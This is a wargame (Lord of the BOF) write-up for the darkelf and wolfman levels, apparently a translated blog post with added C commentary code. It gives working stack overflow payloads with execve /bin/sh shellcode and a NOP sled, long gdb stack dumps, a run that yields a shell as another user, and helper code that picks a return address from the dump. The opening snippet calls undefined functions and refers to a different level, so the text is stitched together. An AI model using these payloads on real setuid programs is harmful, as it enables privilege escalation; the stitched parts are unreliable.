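int pad_argv0(const char *dir, const char *name, size_t want, char *out, size_t outsz) {
    size_t dl = strlen(dir), nl = strlen(name);
    if (dl + 1 + nl > want || want >= outsz) return 0;
    memcpy(out, dir, dl);
    memset(out + dl, '/', want - dl - nl);
    memcpy(out + want - nl, name, nl + 1);   /* includes the terminator */
    return 1;
}

/* Why the shellcode has to live in argv[2]: the 48-byte cap reaches the return
 * address exactly and not one byte further, and environ has just been wiped. */
size_t bytes_to_return_address(void) { return BUF_LEN + 4 + 4; }

int main(void) {
    char argv0[128], argv1[49];
    char env0[] = "SHELLCODE=\x90\x90", *envp[] = { env0, NULL };  /* constructed */
    pad_argv0("/home/darkelf/tmp", "orge", ARGV0_LEN, argv0, sizeof argv0);
    memset(argv1, 0xbf, 48); argv1[48] = '\0';     /* "\xbf"*44 + 4-byte address */
    printf("argv[0]=%s (%zu bytes)\n", argv0, strlen(argv0));
    printf("wiped %zu env entries; gate=%d; bytes to ret=%zu\n",
           wipe_env(envp), (int)orge_gate(argv0, argv1), bytes_to_return_address());
    return 0;
}
```

The session's "argv[0] error" followed by success after adding one more slash is exactly the first check: the path is legal at any slash count, but its length is not.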


Posted by windowhan

Ahh... Monday, early morning, the very peak of refreshment.

Nothing in particular to get my hands on, so I tried solving the BOF Expedition (Lord of the BOF), and ahh...

I put in the shellcode and it fell in one shot, ahahaha. Time to mix some rice with stir-fried jaban.

This time the length of argv[1] was restricted, so I put the shellcode in argv[2] and just pointed the return address over there.

The payload is as follows:

`python -c 'print "\xbf"*44+"\x6c\xfd\xff\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
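An added example (my code, not the post's) for the step the post does by eye: choosing a return address that lands inside the NOP sled that argv[2] leaves on the stack. It parses gdb's `x/Nwx` output (each word is printed as a number but stored little-endian), finds the longest run of 0x90 and returns an address in the middle of it. The embedded dump lines are copied from the `x/300wx $esp` output of the gdb session later in this post (first run, 0xbffffd0c to 0xbffffe4c); in that run argv[2] starts at 0xbffffd13. The later session's dump also explains the segfault before it: argc there is 4 and argv[2] is a one-byte string at 0xbffffd11, the shell having split the argument at the \xff byte, which is why the orge session above switches to bash2 before its successful run.

```c
/* Added example, not code from the original post: parse gdb's "x/Nwx" output
 * and find the NOP sled that argv[2] leaves on the stack, so the return
 * address is taken from inside the sled instead of by trial and error. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define MAP_BASE 0xbffffd0cu
#define MAP_SIZE 0x150u   /* 21 lines x 16 bytes: 0xbffffd0c .. 0xbffffe5b */

/* Copied from the "x/300wx $esp" dump of the gdb session later in this post
 * (first run). argv[2] starts at 0xbffffd13 (its pointer sits at 0xbffffbdc). */
static const char *dump_lines[] = {
    "0xbffffd0c:     0xfcecbfbf      0x9000bfbf      0x90909090      0x90909090",
    "0xbffffd1c:     0x90909090      0x90909090      0x90909090      0x90909090",
    "0xbffffd2c:     0x90909090      0x90909090      0x90909090      0x90909090",
    "0xbffffd3c:     0x90909090      0x90909090      0x90909090      0x90909090",
    "0xbffffd4c:     0x90909090      0x90909090      0x90909090      0x90909090",
    "0xbffffd5c:     0x90909090      0x90909090      0x90909090      0x90909090",
    "0xbffffd6c:     0x90909090      0x90909090      0x90909090      0x90909090",
    "0xbffffd7c:     0x90909090      0x90909090      0x90909090      0x90909090",
    "0xbffffd8c:     0x90909090      0x90909090      0x90909090      0x90909090",
    "0xbffffd9c:     0x90909090      0x90909090      0x90909090      0x90909090",
    "0xbffffdac:     0x90909090      0x90909090      0x90909090      0x90909090",
    "0xbffffdbc:     0x90909090      0x90909090      0x90909090      0x90909090",
    "0xbffffdcc:     0x90909090      0x90909090      0x90909090      0x90909090",
    "0xbffffddc:     0x90909090      0x90909090      0x90909090      0x90909090",
    "0xbffffdec:     0x90909090      0x90909090      0x90909090      0x90909090",
    "0xbffffdfc:     0x90909090      0x90909090      0x90909090      0x90909090",
    "0xbffffe0c:     0x90909090      0x90909090      0x90909090      0x90909090",
    "0xbffffe1c:     0x90909090      0x90909090      0x90909090      0x90909090",
    "0xbffffe2c:     0x90909090      0x90909090      0x90909090      0x90909090",
    "0xbffffe3c:     0x31909090      0x2f6850c0      0x6868732f      0x6e69622f",
    "0xbffffe4c:     0x5350e389      0xb099e189      0x0080cd0b      0x00000000",
};

static uint8_t stack_map[MAP_SIZE];

/* Rebuild the bytes: gdb prints each 32-bit word as a number and an x86 stores
 * it little-endian, so the word 0x9000bfbf is the bytes bf bf 00 90.
 * Returns the number of bytes placed, 0 on a malformed or out-of-range line. */
size_t load_dump(void) {
    size_t n = sizeof dump_lines / sizeof dump_lines[0], filled = 0;
    memset(stack_map, 0, sizeof stack_map);
    for (size_t i = 0; i < n; i++) {
        unsigned addr, w[4];
        if (sscanf(dump_lines[i], "%x: %x %x %x %x", &addr, &w[0], &w[1], &w[2], &w[3]) != 5)
            return 0;
        for (unsigned k = 0; k < 4; k++) {
            unsigned off = addr + 4 * k - MAP_BASE;
            if (off > MAP_SIZE - 4) return 0;
            for (unsigned b = 0; b < 4; b++)
                stack_map[off + b] = (uint8_t)(w[k] >> (8 * b));
            filled += 4;
        }
    }
    return filled;
}

/* Longest run of 0x90 in the map; its start address is written to *start. */
size_t find_sled(uint32_t *start) {
    size_t best = 0, run = 0;
    for (size_t i = 0; i < MAP_SIZE; i++) {
        run = stack_map[i] == 0x90 ? run + 1 : 0;
        if (run > best) { best = run; *start = MAP_BASE + (uint32_t)(i + 1 - run); }
    }
    return best;
}

/* Aim at the middle: a few bytes of layout drift either way still hit NOPs. */
uint32_t pick_return(uint32_t start, size_t len) { return start + (uint32_t)(len / 2); }

int in_sled(uint32_t addr, uint32_t start, size_t len) {
    return addr >= start && (uint64_t)addr < (uint64_t)start + len;
}

int main(void) {
    uint32_t start = 0;
    if (load_dump() == 0) { fputs("malformed dump\n", stderr); return 1; }
    size_t len = find_sled(&start);
    printf("sled 0x%08x..0x%08x (%zu bytes), pick 0x%08x\n",
           start, start + (uint32_t)len - 1, len, pick_return(start, len));
    printf("post's 0xbffffd6c inside: %d; first try 0xbfbffcec inside: %d\n",
           in_sled(0xbffffd6cu, start, len), in_sled(0xbfbffcecu, start, len));
    return 0;
}
```

The sled is the 300 NOPs of the payload, 0xbffffd13 through 0xbffffe3e, and the post's 0xbffffd6c is 89 bytes into it; the first attempt's 0xbfbffcec (the "\xec\xfc\xbf\xbf" run) is nowhere near the stack page, which is the kind of typo the parser catches.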

 

A somewhat truncated log... I guess?

Starting program: /home/wolfman/tmp/attackme `python -c 'print "\xbf"*44+"\xec\xfc\xbf\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜賃옜

Breakpoint 1, 0x8048617 in main ()

(gdb) x/100x $esp-100

0xbffffb28:     0xfffffe7d      0x4005d920      0x400143e0      0xbffffb4c

0xbffffb38:     0x40066070      0x40106980      0x4000ae60      0xbffffbd4

0xbffffb48:     0xbffffb88      0x08048613      0xbffffb60      0x00000000

0xbffffb58:     0x00000028      0x00000013      0x00000000      0x00000000

0xbffffb68:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffb78:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffb88:     0xbfbfbfbf      0xbfbffcec      0x00000000      0xbffffbd4

0xbffffb98:     0xbffffbe4      0x40013868      0x00000003      0x08048450

0xbffffba8:     0x00000000      0x08048471      0x08048500      0x00000003

0xbffffbb8:     0xbffffbd4      0x08048390      0x0804864c      0x4000ae60

0xbffffbc8:     0xbffffbcc      0x40013e90      0x00000003      0xbffffcc7

0xbffffbd8:     0xbffffce2      0xbffffd13      0x00000000      0xbffffe58

0xbffffbe8:     0xbffffe7a      0xbffffe84      0xbffffe92      0xbffffeb1

0xbffffbf8:     0xbffffec1      0xbffffeda      0xbffffef7      0xbfffff01

0xbffffc08:     0xbfffff0f      0xbfffff52      0xbfffff65      0xbfffff7a

0xbffffc18:     0xbfffff8a      0xbfffff97      0xbfffffb6      0xbfffffc1

0xbffffc28:     0xbfffffce      0xbfffffd6      0x00000000      0x00000003

0xbffffc38:     0x08048034      0x00000004      0x00000020      0x00000005

0xbffffc48:     0x00000006      0x00000006      0x00001000      0x00000007

0xbffffc58:     0x40000000      0x00000008      0x00000000      0x00000009

0xbffffc68:     0x08048450      0x0000000b      0x000001f9      0x0000000c

0xbffffc78:     0x000001f9      0x0000000d      0x000001f9      0x0000000e

0xbffffc88:     0x000001f9      0x00000010      0x0febfbff      0x0000000f

0xbffffc98:     0xbffffcc2      0x00000000      0x00000000      0x00000000

---Type <return> to continue, or q <return> to quit---

0xbffffca8:     0x00000000      0x00000000      0x00000000      0x00000000

(gdb)

(gdb) x/100x $esp-500

0xbffff998:     0x40000000      0x00000000      0x400139d0      0x00000000

0xbffff9a8:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff9b8:     0x40013a08      0x40013a00      0x400139d8      0x400139e0

0xbffff9c8:     0x400139e8      0x00000000      0x00000000      0x00000000

0xbffff9d8:     0x400139f0      0x400139f8      0x00000000      0x00000000

0xbffff9e8:     0x400139d0      0x40029b0e      0xbffffac0      0x400081e6

0xbffff9f8:     0x40029ad5      0x40029ad5      0x40013868      0x400143e0

0xbffffa08:     0x00004388      0x40013868      0x40029b0e      0xbffffae4

0xbffffa18:     0x400081e6      0x40029ad5      0x40029ad5      0x40013868

0xbffffa28:     0x400143e0      0x0000785c      0x400081e6      0x40029ad5

0xbffffa38:     0x080482f9      0x40013868      0x40013ed0      0x00000021

0xbffffa48:     0x00000075      0x4001ad70      0x00007080      0x40029b0e

0xbffffa58:     0xbffffb28      0x00000000      0x40029ad5      0x40021df0

0xbffffa68:     0x00000708      0x40021fd0      0x4001ad70      0x400143e0

0xbffffa78:     0x00000003      0x40014650      0x00000001      0xbffffa9c

0xbffffa88:     0x40021df0      0x400145e4      0x0d790266      0xbffffb18

0xbffffa98:     0x4002982c      0x40021df0      0x400143e0      0x400140d4

0xbffffaa8:     0x077905a6      0xbffffb30      0x08048275      0x4001b630

0xbffffab8:     0x400143e0      0x400143e0      0x40014650      0x00000001

0xbffffac8:     0xbffffae0      0x08048184      0x400140d4      0x078e530f

0xbffffad8:     0xbffffb5c      0x080482d0      0x40021ca0      0xbffffb1c

0xbffffae8:     0x4000a7fd      0x400143d0      0x400146b0      0x00000007

0xbffffaf8:     0x4000a74e      0x401081ec      0x4000ae60      0xbffffbd4

0xbffffb08:     0x400143e0      0x40021df0      0x401088c0      0x4002982c

---Type <return> to continue, or q <return> to quit---

0xbffffb18:     0x40021df0      0xbffffb4c      0x4000a970      0xbffffd13

(gdb) x/100x $ebp-300

0xbfbfbe93:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbea3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbeb3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbec3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbed3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbee3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbef3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbf03:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbf13:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbf23:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbf33:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbf43:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbf53:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbf63:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbf73:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbf83:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbf93:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbfa3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbfb3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbfc3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbfd3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbfe3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfbff3:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfbfc003:     0x00000000      0x00000000      0x00000000      0x00000000

---Type <return> to continue, or q <return> to quit---

0xbfbfc013:     0x00000000      0x00000000      0x00000000      0x00000000

(gdb) x/300wx $esp

0xbffffb8c:     0xbfbffcec      0x00000000      0xbffffbd4      0xbffffbe4

0xbffffb9c:     0x40013868      0x00000003      0x08048450      0x00000000

0xbffffbac:     0x08048471      0x08048500      0x00000003      0xbffffbd4

0xbffffbbc:     0x08048390      0x0804864c      0x4000ae60      0xbffffbcc

0xbffffbcc:     0x40013e90      0x00000003      0xbffffcc7      0xbffffce2

0xbffffbdc:     0xbffffd13      0x00000000      0xbffffe58      0xbffffe7a

0xbffffbec:     0xbffffe84      0xbffffe92      0xbffffeb1      0xbffffec1

0xbffffbfc:     0xbffffeda      0xbffffef7      0xbfffff01      0xbfffff0f

0xbffffc0c:     0xbfffff52      0xbfffff65      0xbfffff7a      0xbfffff8a

0xbffffc1c:     0xbfffff97      0xbfffffb6      0xbfffffc1      0xbfffffce

0xbffffc2c:     0xbfffffd6      0x00000000      0x00000003      0x08048034

0xbffffc3c:     0x00000004      0x00000020      0x00000005      0x00000006

0xbffffc4c:     0x00000006      0x00001000      0x00000007      0x40000000

0xbffffc5c:     0x00000008      0x00000000      0x00000009      0x08048450

0xbffffc6c:     0x0000000b      0x000001f9      0x0000000c      0x000001f9

0xbffffc7c:     0x0000000d      0x000001f9      0x0000000e      0x000001f9

0xbffffc8c:     0x00000010      0x0febfbff      0x0000000f      0xbffffcc2

0xbffffc9c:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffcac:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffcbc:     0x00000000      0x36690000      0x2f003638      0x656d6f68

0xbffffccc:     0x6c6f772f      0x6e616d66      0x706d742f      0x7474612f

0xbffffcdc:     0x6d6b6361      0xbfbf0065      0xbfbfbfbf      0xbfbfbfbf

0xbffffcec:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf

0xbffffcfc:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf

---Type <return> to continue, or q <return> to quit---

0xbffffd0c:     0xfcecbfbf      0x9000bfbf      0x90909090      0x90909090

0xbffffd1c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd2c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd3c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd4c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd5c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd6c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd7c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd8c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffd9c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffdac:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffdbc:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffdcc:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffddc:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffdec:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffdfc:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffe0c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffe1c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffe2c:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffe3c:     0x31909090      0x2f6850c0      0x6868732f      0x6e69622f

0xbffffe4c:     0x5350e389      0xb099e189      0x0080cd0b      0x00000000

0xbffffe5c:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffe6c:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffffe7c:     0x00000000      0x00000000      0x00000000      0x00000000

---Type <return> to continue, or q <return> to quit---q

Quit

(gdb) q

The program is running.  Exit anyway? (y or n) y

[wolfman@localhost tmp]$ ./darkelf `python -c 'print "\xbf"*44+"\x6c\xfd\xff\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
bash: ./darkelf: No such file or directory
[wolfman@localhost tmp]$ ./attackme `python -c 'print "\xbf"*44+"\x6c\xfd\xff\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜l
Segmentation fault (core dumped)
[wolfman@localhost tmp]$ gdb -q core
"/home/wolfman/tmp/core": not in executable format: File format not recognized
(gdb) disas main
No symbol table is loaded.  Use the "file" command.
(gdb) q
[wolfman@localhost tmp]$ gdb -q attackme
(gdb) b *main+279
Breakpoint 1 at 0x8048617
(gdb) r `python -c 'print "\xbf"*44+"\x6c\xfd\xff\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
Starting program: /home/wolfman/tmp/attackme `python -c 'print "\xbf"*44+"\x6c\xfd\xff\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜l

Breakpoint 1, 0x8048617 in main ()

(gdb) x/330wx $esp

0xbffffb8c:     0x4000fd6c      0x00000004      0xbffffbd4      0xbffffbe8

0xbffffb9c:     0x40013868      0x00000004      0x08048450      0x00000000

0xbffffbac:     0x08048471      0x08048500      0x00000004      0xbffffbd4

0xbffffbbc:     0x08048390      0x0804864c      0x4000ae60      0xbffffbcc

0xbffffbcc:     0x40013e90      0x00000004      0xbffffcc7      0xbffffce2

0xbffffbdc:     0xbffffd11      0xbffffd13      0x00000000      0xbffffe58

0xbffffbec:     0xbffffe7a      0xbffffe84      0xbffffe92      0xbffffeb1

0xbffffbfc:     0xbffffec1      0xbffffeda      0xbffffef7      0xbfffff01

0xbffffc0c:     0xbfffff0f      0xbfffff52      0xbfffff65      0xbfffff7a

0xbffffc1c:     0xbfffff8a      0xbfffff97      0xbfffffb6      0xbfffffc1
0xbffffc2c:     0xbfffffce      0xbfffffd6      0x00000000      0x00000003
0xbffffc3c:     0x08048034      0x00000004      0x00000020      0x00000005
0xbffffc4c:     0x00000006      0x00000006      0x00001000      0x00000007
0xbffffc5c:     0x40000000      0x00000008      0x00000000      0x00000009
0xbffffc6c:     0x08048450      0x0000000b      0x000001f9      0x0000000c
0xbffffc7c:     0x000001f9      0x0000000d      0x000001f9      0x0000000e
0xbffffc8c:     0x000001f9      0x00000010      0x0febfbff      0x0000000f
0xbffffc9c:     0xbffffcc2      0x00000000      0x00000000      0x00000000
0xbffffcac:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffcbc:     0x00000000      0x36690000      0x2f003638      0x656d6f68
0xbffffccc:     0x6c6f772f      0x6e616d66      0x706d742f      0x7474612f
0xbffffcdc:     0x6d6b6361      0xbfbf0065      0xbfbfbfbf      0xbfbfbfbf
0xbffffcec:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffcfc:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffd0c:     0xfd6cbfbf      0x9000bf00      0x90909090      0x90909090
0xbffffd1c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd2c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd3c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd4c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd5c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd6c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd7c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd8c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd9c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdac:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdbc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdcc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffddc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdec:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdfc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffe0c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffe1c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffe2c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffe3c:     0x31909090      0x2f6850c0      0x6868732f      0x6e69622f
0xbffffe4c:     0x5350e389      0xb099e189      0x0080cd0b      0x00000000
0xbffffe5c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe6c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe7c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe8c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe9c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffeac:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffebc:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffecc:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffedc:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffeec:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffefc:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff0c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff1c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff2c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff3c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff4c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff5c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff6c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff7c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff8c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff9c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffffac:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffffbc:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffffcc:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffffdc:     0x00000000      0x6f682f00      0x772f656d      0x6d666c6f
0xbfffffec:     0x742f6e61      0x612f706d      0x63617474      0x00656d6b
0xbffffffc:     0x00000000      Cannot access memory at address 0xc0000000
(gdb)
(gdb) q
The program is running.  Exit anyway? (y or n) y

[wolfman@localhost tmp]$ bash2
[wolfman@localhost tmp]$ ./attackme `python -c 'print "\xbf"*44+"\x6c\xfd\xff\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜l?
bash$ id
uid=505(wolfman) gid=505(wolfman) groups=505(wolfman)
bash$ q
sh: q: command not found
bash$ exit
exit
[wolfman@localhost tmp]$ cd ../
[wolfman@localhost wolfman]$ ./darkelf `python -c 'print "\xbf"*44+"\x6c\xfd\xff\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜l?
bash$ id
uid=505(wolfman) gid=505(wolfman) euid=506(darkelf) egid=506(darkelf) groups=505(wolfman)
bash$ whoami
darkelf
bash$ my-pass
euid = 506
kernel crashed
bash$



Posted by windowhan

I can't remember where I wrote down the cobolt one in between;;


[orc@localhost tmp]$ gdb -q wolfman
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>:       push   %ebp
0x8048501 <main+1>:     mov    %esp,%ebp
0x8048503 <main+3>:     sub    $0x2c,%esp
0x8048506 <main+6>:     cmpl   $0x1,0x8(%ebp)
0x804850a <main+10>:    jg     0x8048523 <main+35>
0x804850c <main+12>:    push   $0x8048640
0x8048511 <main+17>:    call   0x8048410 <printf>
0x8048516 <main+22>:    add    $0x4,%esp
0x8048519 <main+25>:    push   $0x0
0x804851b <main+27>:    call   0x8048420 <exit>
0x8048520 <main+32>:    add    $0x4,%esp
0x8048523 <main+35>:    nop
0x8048524 <main+36>:    movl   $0x0,0xffffffd4(%ebp)
0x804852b <main+43>:    nop
0x804852c <main+44>:    lea    0x0(%esi,1),%esi
0x8048530 <main+48>:    mov    0xffffffd4(%ebp),%eax
0x8048533 <main+51>:    lea    0x0(,%eax,4),%edx
0x804853a <main+58>:    mov    0x8049760,%eax
0x804853f <main+63>:    cmpl   $0x0,(%eax,%edx,1)
0x8048543 <main+67>:    jne    0x8048547 <main+71>
0x8048545 <main+69>:    jmp    0x8048587 <main+135>
0x8048547 <main+71>:    mov    0xffffffd4(%ebp),%eax
0x804854a <main+74>:    lea    0x0(,%eax,4),%edx
0x8048551 <main+81>:    mov    0x8049760,%eax
0x8048556 <main+86>:    mov    (%eax,%edx,1),%edx
0x8048559 <main+89>:    push   %edx
0x804855a <main+90>:    call   0x80483f0 <strlen>
0x804855f <main+95>:    add    $0x4,%esp
0x8048562 <main+98>:    mov    %eax,%eax
0x8048564 <main+100>:   push   %eax
0x8048565 <main+101>:   push   $0x0
0x8048567 <main+103>:   mov    0xffffffd4(%ebp),%eax
0x804856a <main+106>:   lea    0x0(,%eax,4),%edx
0x8048571 <main+113>:   mov    0x8049760,%eax
0x8048576 <main+118>:   mov    (%eax,%edx,1),%edx
0x8048579 <main+121>:   push   %edx
0x804857a <main+122>:   call   0x8048430 <memset>
0x804857f <main+127>:   add    $0xc,%esp
0x8048582 <main+130>:   incl   0xffffffd4(%ebp)
0x8048585 <main+133>:   jmp    0x8048530 <main+48>
0x8048587 <main+135>:   mov    0xc(%ebp),%eax
0x804858a <main+138>:   add    $0x4,%eax
0x804858d <main+141>:   mov    (%eax),%edx
0x804858f <main+143>:   add    $0x2f,%edx
0x8048592 <main+146>:   cmpb   $0xbf,(%edx)
0x8048595 <main+149>:   je     0x80485b0 <main+176>
0x8048597 <main+151>:   push   $0x804864c
0x804859c <main+156>:   call   0x8048410 <printf>
0x80485a1 <main+161>:   add    $0x4,%esp
0x80485a4 <main+164>:   push   $0x0
0x80485a6 <main+166>:   call   0x8048420 <exit>
0x80485ab <main+171>:   add    $0x4,%esp
0x80485ae <main+174>:   mov    %esi,%esi
0x80485b0 <main+176>:   mov    0xc(%ebp),%eax
0x80485b3 <main+179>:   add    $0x4,%eax
0x80485b6 <main+182>:   mov    (%eax),%edx
0x80485b8 <main+184>:   push   %edx
0x80485b9 <main+185>:   lea    0xffffffd8(%ebp),%eax
0x80485bc <main+188>:   push   %eax
0x80485bd <main+189>:   call   0x8048440 <strcpy>
0x80485c2 <main+194>:   add    $0x8,%esp
0x80485c5 <main+197>:   lea    0xffffffd8(%ebp),%eax
0x80485c8 <main+200>:   push   %eax
0x80485c9 <main+201>:   push   $0x8048669
0x80485ce <main+206>:   call   0x8048410 <printf>
0x80485d3 <main+211>:   add    $0x8,%esp
0x80485d6 <main+214>:   push   $0x28
0x80485d8 <main+216>:   push   $0x0
0x80485da <main+218>:   lea    0xffffffd8(%ebp),%eax
0x80485dd <main+221>:   push   %eax
0x80485de <main+222>:   call   0x8048430 <memset>
0x80485e3 <main+227>:   add    $0xc,%esp
0x80485e6 <main+230>:   leave
0x80485e7 <main+231>:   ret
0x80485e8 <main+232>:   nop
0x80485e9 <main+233>:   nop
0x80485ea <main+234>:   nop
0x80485eb <main+235>:   nop
0x80485ec <main+236>:   nop
0x80485ed <main+237>:   nop
0x80485ee <main+238>:   nop
0x80485ef <main+239>:   nop
End of assembler dump.
(gdb) b *main+231
Breakpoint 1 at 0x80485e7
(gdb) r `python -c 'print "\xbf"*44+"\xec\xfc\xff\xbf"'``python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
Starting program: /home/orc/tmp/wolfman `python -c 'print "\xbf"*44+"\xec\xfc\xff\xbf"'``python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
stack is still your friend.

Program exited normally.
